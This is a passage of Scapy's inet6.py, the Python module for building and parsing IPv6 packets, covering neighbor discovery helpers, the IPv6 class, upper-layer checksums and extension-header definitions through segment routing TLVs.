1#############################################################################
2#                                                                           #
3#  inet6.py --- IPv6 support for Scapy                                      #
4#               see http://natisbad.org/IPv6/                               #
5#               for more information                                        #
6#                                                                           #
7#  Copyright (C) 2005  Guillaume Valadon <guedou@hongo.wide.ad.jp>          #
8#                      Arnaud Ebalard <arnaud.ebalard@eads.net>             #
9#                                                                           #
10#  This program is free software; you can redistribute it and/or modify it  #
11#  under the terms of the GNU General Public License version 2 as           #
12#  published by the Free Software Foundation.                               #
13#                                                                           #
14#  This program is distributed in the hope that it will be useful, but      #
15#  WITHOUT ANY WARRANTY; without even the implied warranty of               #
16#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU        #
17#  General Public License for more details.                                 #
18#                                                                           #
19#############################################################################
20
21"""
22IPv6 (Internet Protocol v6).
23"""
24
25
26from __future__ import absolute_import
27from __future__ import print_function
28
29from hashlib import md5
30import random
31import socket
32import struct
33from time import gmtime, strftime
34
35from scapy.arch import get_if_hwaddr
36from scapy.as_resolvers import AS_resolver_riswhois
37from scapy.base_classes import Gen
38from scapy.compat import chb, orb, raw, plain_str, bytes_encode
39from scapy.config import conf
40from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
41    MTU
42from scapy.error import log_runtime, warning
43from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
44    DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \
45    LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \
46    ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \
47    X3BytesField, XBitField, XIntField, XShortField
48from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
49    UDP, UDPerror
50from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
51import scapy.modules.six as six
52from scapy.packet import bind_layers, Packet, Raw
53from scapy.sendrecv import sendp, sniff, sr, srp1
54from scapy.supersocket import SuperSocket, L3RawSocket
55from scapy.utils import checksum, strxor
56from scapy.pton_ntop import inet_pton, inet_ntop
57from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
58    in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
59    in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
60from scapy.volatile import RandInt, RandShort
61
62if not socket.has_ipv6:
63    raise socket.error("can't use AF_INET6, IPv6 is disabled")
64if not hasattr(socket, "IPPROTO_IPV6"):
65    # Workaround for http://bugs.python.org/issue6926
66    socket.IPPROTO_IPV6 = 41
67if not hasattr(socket, "IPPROTO_IPIP"):
68    # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
69    socket.IPPROTO_IPIP = 4
70
71if conf.route6 is None:
72    # unused import, only to initialize conf.route6
73    import scapy.route6  # noqa: F401
74
75##########################
76#  Neighbor cache stuff  #
77##########################
78
79conf.netcache.new_cache("in6_neighbor", 120)
80
81
82@conf.commands.register
83def neighsol(addr, src, iface, timeout=1, chainCC=0):
84    """Sends and receive an ICMPv6 Neighbor Solicitation message
85
86    This function sends an ICMPv6 Neighbor Solicitation message
87    to get the MAC address of the neighbor with specified IPv6 address address.
88
89    'src' address is used as source of the message. Message is sent on iface.
90    By default, timeout waiting for an answer is 1 second.
91
92    If no answer is gathered, None is returned. Else, the answer is
93    returned (ethernet frame).
94    """
95
96    nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
97    d = inet_ntop(socket.AF_INET6, nsma)
98    dm = in6_getnsmac(nsma)
99    p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255)
100    p /= ICMPv6ND_NS(tgt=addr)
101    p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
102    res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
103               chainCC=chainCC)
104
105    return res
106
107
108@conf.commands.register
109def getmacbyip6(ip6, chainCC=0):
110    """Returns the MAC address corresponding to an IPv6 address
111
112    neighborCache.get() method is used on instantiated neighbor cache.
113    Resolution mechanism is described in associated doc string.
114
115    (chainCC parameter value ends up being passed to sending function
116     used to perform the resolution, if needed)
117    """
118
119    if isinstance(ip6, Net6):
120        ip6 = str(ip6)
121
122    if in6_ismaddr(ip6):  # Multicast
123        mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
124        return mac
125
126    iff, a, nh = conf.route6.route(ip6)
127
128    if iff == conf.loopback_name:
129        return "ff:ff:ff:ff:ff:ff"
130
131    if nh != '::':
132        ip6 = nh  # Found next hop
133
134    mac = conf.netcache.in6_neighbor.get(ip6)
135    if mac:
136        return mac
137
138    res = neighsol(ip6, a, iff, chainCC=chainCC)
139
140    if res is not None:
141        if ICMPv6NDOptDstLLAddr in res:
142            mac = res[ICMPv6NDOptDstLLAddr].lladdr
143        else:
144            mac = res.src
145        conf.netcache.in6_neighbor[ip6] = mac
146        return mac
147
148    return None
149
150
151#############################################################################
152#############################################################################
153#                                IPv6 Class                                 #
154#############################################################################
155#############################################################################
156
157ipv6nh = {0: "Hop-by-Hop Option Header",
158          4: "IP",
159          6: "TCP",
160          17: "UDP",
161          41: "IPv6",
162          43: "Routing Header",
163          44: "Fragment Header",
164          47: "GRE",
165          50: "ESP Header",
166          51: "AH Header",
167          58: "ICMPv6",
168          59: "No Next Header",
169          60: "Destination Option Header",
170          112: "VRRP",
171          132: "SCTP",
172          135: "Mobility Header"}
173
174ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
175             4: "IP",
176             6: "TCP",
177             17: "UDP",
178             43: "IPv6ExtHdrRouting",
179             44: "IPv6ExtHdrFragment",
180             50: "ESP",
181             51: "AH",
182             58: "ICMPv6Unknown",
183             59: "Raw",
184             60: "IPv6ExtHdrDestOpt"}
185
186
187class IP6ListField(StrField):
188    __slots__ = ["count_from", "length_from"]
189    islist = 1
190
191    def __init__(self, name, default, count_from=None, length_from=None):
192        if default is None:
193            default = []
194        StrField.__init__(self, name, default)
195        self.count_from = count_from
196        self.length_from = length_from
197
198    def i2len(self, pkt, i):
199        return 16 * len(i)
200
201    def i2count(self, pkt, i):
202        if isinstance(i, list):
203            return len(i)
204        return 0
205
206    def getfield(self, pkt, s):
207        c = tmp_len = None
208        if self.length_from is not None:
209            tmp_len = self.length_from(pkt)
210        elif self.count_from is not None:
211            c = self.count_from(pkt)
212
213        lst = []
214        ret = b""
215        remain = s
216        if tmp_len is not None:
217            remain, ret = s[:tmp_len], s[tmp_len:]
218        while remain:
219            if c is not None:
220                if c <= 0:
221                    break
222                c -= 1
223            addr = inet_ntop(socket.AF_INET6, remain[:16])
224            lst.append(addr)
225            remain = remain[16:]
226        return remain + ret, lst
227
228    def i2m(self, pkt, x):
229        s = b""
230        for y in x:
231            try:
232                y = inet_pton(socket.AF_INET6, y)
233            except Exception:
234                y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
235                y = inet_pton(socket.AF_INET6, y)
236            s += y
237        return s
238
239    def i2repr(self, pkt, x):
240        s = []
241        if x is None:
242            return "[]"
243        for y in x:
244            s.append('%s' % y)
245        return "[ %s ]" % (", ".join(s))
246
247
248class _IPv6GuessPayload:
249    name = "Dummy class that implements guess_payload_class() for IPv6"
250
251    def default_payload_class(self, p):
252        if self.nh == 58:  # ICMPv6
253            t = orb(p[0])
254            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
255                return _niquery_guesser(p)
256            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages  # noqa: E501
257                if t == 130 and len(p) >= 28:
258                    # RFC 3810 - 8.1. Query Version Distinctions
259                    return ICMPv6MLQuery2
260                return icmp6typescls.get(t, Raw)
261            return Raw
262        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
263            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
264        elif self.nh == 43 and orb(p[2]) == 4:  # Segment Routing header
265            return IPv6ExtHdrSegmentRouting
266        return ipv6nhcls.get(self.nh, Raw)
267
268
269class IPv6(_IPv6GuessPayload, Packet, IPTools):
270    name = "IPv6"
271    fields_desc = [BitField("version", 6, 4),
272                   BitField("tc", 0, 8),
273                   BitField("fl", 0, 20),
274                   ShortField("plen", None),
275                   ByteEnumField("nh", 59, ipv6nh),
276                   ByteField("hlim", 64),
277                   SourceIP6Field("src", "dst"),  # dst is for src @ selection
278                   DestIP6Field("dst", "::1")]
279
280    def route(self):
281        """Used to select the L2 address"""
282        dst = self.dst
283        if isinstance(dst, Gen):
284            dst = next(iter(dst))
285        return conf.route6.route(dst)
286
287    def mysummary(self):
288        return "%s > %s (%i)" % (self.src, self.dst, self.nh)
289
290    def post_build(self, p, pay):
291        p += pay
292        if self.plen is None:
293            tmp_len = len(p) - 40
294            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
295        return p
296
297    def extract_padding(self, data):
298        """Extract the IPv6 payload"""
299
300        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
301            # Extract Hop-by-Hop extension length
302            hbh_len = orb(data[1])
303            hbh_len = 8 + hbh_len * 8
304
305            # Extract length from the Jumbogram option
306            # Note: the following algorithm take advantage of the Jumbo option
307            #        mandatory alignment (4n + 2, RFC2675 Section 2)
308            jumbo_len = None
309            idx = 0
310            offset = 4 * idx + 2
311            while offset <= len(data):
312                opt_type = orb(data[offset])
313                if opt_type == 0xc2:  # Jumbo option
314                    jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0]  # noqa: E501
315                    break
316                offset = 4 * idx + 2
317                idx += 1
318
319            if jumbo_len is None:
320                log_runtime.info("Scapy did not find a Jumbo option")
321                jumbo_len = 0
322
323            tmp_len = hbh_len + jumbo_len
324        else:
325            tmp_len = self.plen
326
327        return data[:tmp_len], data[tmp_len:]
328
329    def hashret(self):
330        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
331            if self.payload.type < 128:
332                return self.payload.payload.hashret()
333            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
334                return struct.pack("B", self.nh) + self.payload.hashret()
335
336        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
337            return self.payload.hashret()
338
339        nh = self.nh
340        sd = self.dst
341        ss = self.src
342        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
343            # With routing header, the destination is the last
344            # address of the IPv6 list if segleft > 0
345            nh = self.payload.nh
346            try:
347                sd = self.addresses[-1]
348            except IndexError:
349                sd = '::1'
350            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
351            #       could be anything from the original list ...
352            if 1:
353                sd = inet_pton(socket.AF_INET6, sd)
354                for a in self.addresses:
355                    a = inet_pton(socket.AF_INET6, a)
356                    sd = strxor(sd, a)
357                sd = inet_ntop(socket.AF_INET6, sd)
358
359        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
360            # With segment routing header (rh == 4), the destination is
361            # the first address of the IPv6 addresses list
362            try:
363                sd = self.addresses[0]
364            except IndexError:
365                sd = self.dst
366
367        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
368            nh = self.payload.nh
369
370        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
371            nh = self.payload.nh
372
373        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
374            foundhao = None
375            for o in self.payload.options:
376                if isinstance(o, HAO):
377                    foundhao = o
378            if foundhao:
379                nh = self.payload.nh  # XXX what if another extension follows ?
380                ss = foundhao.hoa
381
382        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
383            sd = inet_pton(socket.AF_INET6, sd)
384            ss = inet_pton(socket.AF_INET6, ss)
385            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
386        else:
387            return struct.pack("B", nh) + self.payload.hashret()
388
389    def answers(self, other):
390        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
391            if self.nh in [4, 41]:
392                return self.payload.answers(other)
393            if isinstance(other, IPv6) and other.nh in [4, 41]:
394                return self.answers(other.payload)
395            if isinstance(other, IP) and other.proto in [4, 41]:
396                return self.answers(other.payload)
397        if not isinstance(other, IPv6):  # self is reply, other is request
398            return False
399        if conf.checkIPaddr:
400            # ss = inet_pton(socket.AF_INET6, self.src)
401            sd = inet_pton(socket.AF_INET6, self.dst)
402            os = inet_pton(socket.AF_INET6, other.src)
403            od = inet_pton(socket.AF_INET6, other.dst)
404            # request was sent to a multicast address (other.dst)
405            # Check reply destination addr matches request source addr (i.e
406            # sd == os) except when reply is multicasted too
407            # XXX test mcast scope matching ?
408            if in6_ismaddr(other.dst):
409                if in6_ismaddr(self.dst):
410                    if ((od == sd) or
411                            (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
412                        return self.payload.answers(other.payload)
413                    return False
414                if (os == sd):
415                    return self.payload.answers(other.payload)
416                return False
417            elif (sd != os):  # or ss != od): <- removed for ICMP errors
418                return False
419        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
420            # ICMPv6 Error message -> generated by IPv6 packet
421            # Note : at the moment, we jump the ICMPv6 specific class
422            # to call answers() method of erroneous packet (over
423            # initial packet). There can be cases where an ICMPv6 error
424            # class could implement a specific answers method that perform
425            # a specific task. Currently, don't see any use ...
426            return self.payload.payload.answers(other)
427        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
428            return self.payload.answers(other.payload)
429        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
430            return self.payload.answers(other.payload.payload)
431        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
432            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
433        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
434            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
435        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
436            return self.payload.payload.answers(other.payload.payload)
437        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
438            return self.payload.payload.answers(other.payload)
439        else:
440            if (self.nh != other.nh):
441                return False
442            return self.payload.answers(other.payload)
443
444
445class IPv46(IP):
446    """
447    This class implements a dispatcher that is used to detect the IP version
448    while parsing Raw IP pcap files.
449    """
450    @classmethod
451    def dispatch_hook(cls, _pkt=None, *_, **kargs):
452        if _pkt:
453            if orb(_pkt[0]) >> 4 == 6:
454                return IPv6
455        elif kargs.get("version") == 6:
456            return IPv6
457        return IP
458
459
460def inet6_register_l3(l2, l3):
461    return getmacbyip6(l3.dst)
462
463
464conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
465
466
467class IPerror6(IPv6):
468    name = "IPv6 in ICMPv6"
469
470    def answers(self, other):
471        if not isinstance(other, IPv6):
472            return False
473        sd = inet_pton(socket.AF_INET6, self.dst)
474        ss = inet_pton(socket.AF_INET6, self.src)
475        od = inet_pton(socket.AF_INET6, other.dst)
476        os = inet_pton(socket.AF_INET6, other.src)
477
478        # Make sure that the ICMPv6 error is related to the packet scapy sent
479        if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
480
481            # find upper layer for self (possible citation)
482            selfup = self.payload
483            while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
484                selfup = selfup.payload
485
486            # find upper layer for other (initial packet). Also look for RH
487            otherup = other.payload
488            request_has_rh = False
489            while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
490                if isinstance(otherup, IPv6ExtHdrRouting):
491                    request_has_rh = True
492                otherup = otherup.payload
493
494            if ((ss == os and sd == od) or  # < Basic case
495                    (ss == os and request_has_rh)):
496                # ^ Request has a RH : don't check dst address
497
498                # Let's deal with possible MSS Clamping
499                if (isinstance(selfup, TCP) and
500                    isinstance(otherup, TCP) and
501                        selfup.options != otherup.options):  # seems clamped
502
503                    # Save fields modified by MSS clamping
504                    old_otherup_opts = otherup.options
505                    old_otherup_cksum = otherup.chksum
506                    old_otherup_dataofs = otherup.dataofs
507                    old_selfup_opts = selfup.options
508                    old_selfup_cksum = selfup.chksum
509                    old_selfup_dataofs = selfup.dataofs
510
511                    # Nullify them
512                    otherup.options = []
513                    otherup.chksum = 0
514                    otherup.dataofs = 0
515                    selfup.options = []
516                    selfup.chksum = 0
517                    selfup.dataofs = 0
518
519                    # Test it and save result
520                    s1 = raw(selfup)
521                    s2 = raw(otherup)
522                    tmp_len = min(len(s1), len(s2))
523                    res = s1[:tmp_len] == s2[:tmp_len]
524
525                    # recall saved values
526                    otherup.options = old_otherup_opts
527                    otherup.chksum = old_otherup_cksum
528                    otherup.dataofs = old_otherup_dataofs
529                    selfup.options = old_selfup_opts
530                    selfup.chksum = old_selfup_cksum
531                    selfup.dataofs = old_selfup_dataofs
532
533                    return res
534
535                s1 = raw(selfup)
536                s2 = raw(otherup)
537                tmp_len = min(len(s1), len(s2))
538                return s1[:tmp_len] == s2[:tmp_len]
539
540        return False
541
542    def mysummary(self):
543        return Packet.mysummary(self)
544
545
546#############################################################################
547#############################################################################
548#                 Upper Layer Checksum computation                          #
549#############################################################################
550#############################################################################
551
552class PseudoIPv6(Packet):  # IPv6 Pseudo-header for checksum computation
553    name = "Pseudo IPv6 Header"
554    fields_desc = [IP6Field("src", "::"),
555                   IP6Field("dst", "::"),
556                   ShortField("uplen", None),
557                   BitField("zero", 0, 24),
558                   ByteField("nh", 0)]
559
560
561def in6_chksum(nh, u, p):
562    """
563    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
564
565    Performs IPv6 Upper Layer checksum computation.
566
567    This function operates by filling a pseudo header class instance
568    (PseudoIPv6) with:
569    - Next Header value
570    - the address of _final_ destination (if some Routing Header with non
571    segleft field is present in underlayer classes, last address is used.)
572    - the address of _real_ source (basically the source address of an
573    IPv6 class instance available in the underlayer or the source address
574    in HAO option if some Destination Option header found in underlayer
575    includes this option).
576    - the length is the length of provided payload string ('p')
577
578    :param nh: value of upper layer protocol
579    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
580        provided with all under layers (IPv6 and all extension headers,
581        for example)
582    :param p: the payload of the upper layer provided as a string
583    """
584
585    ph6 = PseudoIPv6()
586    ph6.nh = nh
587    rthdr = 0
588    hahdr = 0
589    final_dest_addr_found = 0
590    while u is not None and not isinstance(u, IPv6):
591        if (isinstance(u, IPv6ExtHdrRouting) and
592            u.segleft != 0 and len(u.addresses) != 0 and
593                final_dest_addr_found == 0):
594            rthdr = u.addresses[-1]
595            final_dest_addr_found = 1
596        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
597              u.segleft != 0 and len(u.addresses) != 0 and
598              final_dest_addr_found == 0):
599            rthdr = u.addresses[0]
600            final_dest_addr_found = 1
601        elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
602              isinstance(u.options[0], HAO)):
603            hahdr = u.options[0].hoa
604        u = u.underlayer
605    if u is None:
606        warning("No IPv6 underlayer to compute checksum. Leaving null.")
607        return 0
608    if hahdr:
609        ph6.src = hahdr
610    else:
611        ph6.src = u.src
612    if rthdr:
613        ph6.dst = rthdr
614    else:
615        ph6.dst = u.dst
616    ph6.uplen = len(p)
617    ph6s = raw(ph6)
618    return checksum(ph6s + p)
619
620
621#############################################################################
622#############################################################################
623#                           Extension Headers                               #
624#############################################################################
625#############################################################################
626
627
628# Inherited by all extension header classes
629class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
630    name = 'Abstract IPv6 Option Header'
631    aliastypes = [IPv6, IPerror6]  # TODO ...
632
633
634#                    IPv6 options for Extension Headers                     #
635
636_hbhopts = {0x00: "Pad1",
637            0x01: "PadN",
638            0x04: "Tunnel Encapsulation Limit",
639            0x05: "Router Alert",
640            0x06: "Quick-Start",
641            0xc2: "Jumbo Payload",
642            0xc9: "Home Address Option"}
643
644
645class _OTypeField(ByteEnumField):
646    """
647    Modified BytEnumField that displays information regarding the IPv6 option
648    based on its option type value (What should be done by nodes that process
649    the option if they do not understand it ...)
650
651    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
652    """
653    pol = {0x00: "00: skip",
654           0x40: "01: discard",
655           0x80: "10: discard+ICMP",
656           0xC0: "11: discard+ICMP not mcast"}
657
658    enroutechange = {0x00: "0: Don't change en-route",
659                     0x20: "1: May change en-route"}
660
661    def i2repr(self, pkt, x):
662        s = self.i2s.get(x, repr(x))
663        polstr = self.pol[(x & 0xC0)]
664        enroutechangestr = self.enroutechange[(x & 0x20)]
665        return "%s [%s, %s]" % (s, polstr, enroutechangestr)
666
667
668class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
669    name = "Scapy6 Unknown Option"
670    fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
671                   FieldLenField("optlen", None, length_of="optdata", fmt="B"),
672                   StrLenField("optdata", "",
673                               length_from=lambda pkt: pkt.optlen)]
674
675    def alignment_delta(self, curpos):  # By default, no alignment requirement
676        """
677        As specified in section 4.2 of RFC 2460, every options has
678        an alignment requirement usually expressed xn+y, meaning
679        the Option Type must appear at an integer multiple of x octets
680        from the start of the header, plus y octets.
681
682        That function is provided the current position from the
683        start of the header and returns required padding length.
684        """
685        return 0
686
687    @classmethod
688    def dispatch_hook(cls, _pkt=None, *args, **kargs):
689        if _pkt:
690            o = orb(_pkt[0])  # Option type
691            if o in _hbhoptcls:
692                return _hbhoptcls[o]
693        return cls
694
695    def extract_padding(self, p):
696        return b"", p
697
698
699class Pad1(Packet):  # IPv6 Hop-By-Hop Option
700    name = "Pad1"
701    fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
702
703    def alignment_delta(self, curpos):  # No alignment requirement
704        return 0
705
706    def extract_padding(self, p):
707        return b"", p
708
709
710class PadN(Packet):  # IPv6 Hop-By-Hop Option
711    name = "PadN"
712    fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
713                   FieldLenField("optlen", None, length_of="optdata", fmt="B"),
714                   StrLenField("optdata", "",
715                               length_from=lambda pkt: pkt.optlen)]
716
717    def alignment_delta(self, curpos):  # No alignment requirement
718        return 0
719
720    def extract_padding(self, p):
721        return b"", p
722
723
724class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
725    name = "Router Alert"
726    fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
727                   ByteField("optlen", 2),
728                   ShortEnumField("value", None,
729                                  {0: "Datagram contains a MLD message",
730                                   1: "Datagram contains RSVP message",
731                                   2: "Datagram contains an Active Network message",  # noqa: E501
732                                   68: "NSIS NATFW NSLP",
733                                   69: "MPLS OAM",
734                                   65535: "Reserved"})]
735    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
736    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
737    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
738    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
739
740    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
741        x = 2
742        y = 0
743        delta = x * ((curpos - y + x - 1) // x) + y - curpos
744        return delta
745
746    def extract_padding(self, p):
747        return b"", p
748
749
750class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
751    name = "Jumbo Payload"
752    fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
753                   ByteField("optlen", 4),
754                   IntField("jumboplen", None)]
755
756    def alignment_delta(self, curpos):  # alignment requirement : 4n+2
757        x = 4
758        y = 2
759        delta = x * ((curpos - y + x - 1) // x) + y - curpos
760        return delta
761
762    def extract_padding(self, p):
763        return b"", p
764
765
766class HAO(Packet):  # IPv6 Destination Options Header Option
767    name = "Home Address Option"
768    fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
769                   ByteField("optlen", 16),
770                   IP6Field("hoa", "::")]
771
772    def alignment_delta(self, curpos):  # alignment requirement : 8n+6
773        x = 8
774        y = 6
775        delta = x * ((curpos - y + x - 1) // x) + y - curpos
776        return delta
777
778    def extract_padding(self, p):
779        return b"", p
780
781
782_hbhoptcls = {0x00: Pad1,
783              0x01: PadN,
784              0x05: RouterAlert,
785              0xC2: Jumbo,
786              0xC9: HAO}
787
788
789#                         Hop-by-Hop Extension Header                       #
790
791class _OptionsField(PacketListField):
792    __slots__ = ["curpos"]
793
794    def __init__(self, name, default, cls, curpos, *args, **kargs):
795        self.curpos = curpos
796        PacketListField.__init__(self, name, default, cls, *args, **kargs)
797
798    def i2len(self, pkt, i):
799        return len(self.i2m(pkt, i))
800
801    def i2m(self, pkt, x):
802        autopad = None
803        try:
804            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
805        except Exception:
806            autopad = 1
807
808        if not autopad:
809            return b"".join(map(str, x))
810
811        curpos = self.curpos
812        s = b""
813        for p in x:
814            d = p.alignment_delta(curpos)
815            curpos += d
816            if d == 1:
817                s += raw(Pad1())
818            elif d != 0:
819                s += raw(PadN(optdata=b'\x00' * (d - 2)))
820            pstr = raw(p)
821            curpos += len(pstr)
822            s += pstr
823
824        # Let's make the class including our option field
825        # a multiple of 8 octets long
826        d = curpos % 8
827        if d == 0:
828            return s
829        d = 8 - d
830        if d == 1:
831            s += raw(Pad1())
832        elif d != 0:
833            s += raw(PadN(optdata=b'\x00' * (d - 2)))
834
835        return s
836
837    def addfield(self, pkt, s, val):
838        return s + self.i2m(pkt, val)
839
840
841class _PhantomAutoPadField(ByteField):
842    def addfield(self, pkt, s, val):
843        return s
844
845    def getfield(self, pkt, s):
846        return s, 1
847
848    def i2repr(self, pkt, x):
849        if x:
850            return "On"
851        return "Off"
852
853
854class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
855    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
856    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
857                   FieldLenField("len", None, length_of="options", fmt="B",
858                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
859                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
860                   _OptionsField("options", [], HBHOptUnknown, 2,
861                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
862    overload_fields = {IPv6: {"nh": 0}}
863
864
865#                        Destination Option Header                          #
866
867class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
868    name = "IPv6 Extension Header - Destination Options Header"
869    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
870                   FieldLenField("len", None, length_of="options", fmt="B",
871                                 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
872                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
873                   _OptionsField("options", [], HBHOptUnknown, 2,
874                                 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)]  # noqa: E501
875    overload_fields = {IPv6: {"nh": 60}}
876
877
878#                             Routing Header                                #
879
880class IPv6ExtHdrRouting(_IPv6ExtHdr):
881    name = "IPv6 Option Header Routing"
882    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
883                   FieldLenField("len", None, count_of="addresses", fmt="B",
884                                 adjust=lambda pkt, x:2 * x),  # in 8 bytes blocks  # noqa: E501
885                   ByteField("type", 0),
886                   ByteField("segleft", None),
887                   BitField("reserved", 0, 32),  # There is meaning in this field ...  # noqa: E501
888                   IP6ListField("addresses", [],
889                                length_from=lambda pkt: 8 * pkt.len)]
890    overload_fields = {IPv6: {"nh": 43}}
891
892    def post_build(self, pkt, pay):
893        if self.segleft is None:
894            pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
895        return _IPv6ExtHdr.post_build(self, pkt, pay)
896
897
898#                         Segment Routing Header                            #
899
900# This implementation is based on RFC8754, but some older snippets come from:
901# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
902
903_segment_routing_header_tlvs = {
904    # RFC 8754 sect 8.2
905    0: "Pad1 TLV",
906    1: "Ingress Node TLV",  # draft 06
907    2: "Egress Node TLV",  # draft 06
908    4: "PadN TLV",
909    5: "HMAC TLV",
910}
911
912
913class IPv6ExtHdrSegmentRoutingTLV(Packet):
914    name = "IPv6 Option Header Segment Routing - Generic TLV"
915    # RFC 8754 sect 2.1
916    fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
917                   ByteField("len", 0),
918                   StrLenField("value", "", length_from=lambda pkt: pkt.len)]
919
920    def extract_padding(self, p):
921        return b"", p
922
923    registered_sr_tlv = {}
924
925    @classmethod
926    def register_variant(cls):
927        cls.registered_sr_tlv[cls.type.default] = cls
928
929    @classmethod
930    def dispatch_hook(cls, pkt=None, *args, **kargs):
931        if pkt:
932            tmp_type = ord(pkt[:1])
933            return cls.registered_sr_tlv.get(tmp_type, cls)
934        return cls
935
936
937class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
938    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
939    # draft-ietf-6man-segment-routing-header-06 3.1.1
940    fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
941                   ByteField("len", 18),
942                   ByteField("reserved", 0),
943                   ByteField("flags", 0),
944                   IP6Field("ingress_node", "::1")]
945
946
947class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
948    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
949    # draft-ietf-6man-segment-routing-header-06 3.1.2
950    fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
951                   ByteField("len", 18),
952                   ByteField("reserved", 0),
953                   ByteField("flags", 0),
954                   IP6Field("egress_node", "::1")]
955
956
